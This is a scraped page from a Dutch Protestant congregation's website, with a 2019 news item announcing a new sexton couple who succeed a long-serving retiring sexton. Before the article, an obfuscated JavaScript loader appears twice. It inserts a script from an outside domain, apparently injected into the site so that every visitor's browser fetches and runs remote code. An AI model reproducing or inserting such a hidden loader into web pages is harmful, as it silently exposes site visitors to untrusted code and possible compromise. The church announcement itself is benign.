;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Wisseling van de wacht ... - PKN Damwâld

Wisseling van de wacht …

Gepubliceerd op: dinsdag 26 november 2019

Anne en Mildred Talma zullen per 1 december 2019 officieel gaan fungeren als ‘kostersechtpaar’ binnen Hervormd Akkerwoude c.a. Daarmee volgen ze Piet Veenstra op, die na een 25-jarig dienstverband per 31 december 2019 zijn werkzaamheden zal neerleggen. Het afscheid van Piet Veenstra laat vanwege ziekte nog enigszins op zich wachten, maar de bedoeling is dat Piet op binnenkort op passende wijze zal worden bedankt voor al zijn werkzaamheden. Saillant detail is overigens dat Anne Talma in de voetsporen zal treden van zijn oom Fokke, die in grote samenwerking met zijn broer Linze vanaf 1 januari 1964 meer dan dertig jaar koster onze gemeente is geweest.

Grote dank aan alle ‘hulpkosters’ die zich in de afgelopen periode geweldig hebben gekweten van hun taak bij de vervanging van Piet Veenstra in de afgelopen maanden !

Wij krijgen met Anne en Mildred een enthousiast kostersechtpaar, die er helemaal voor willen gaan. Wij wensen hun bij dit werk dan ook Gods onmisbare zegen toe!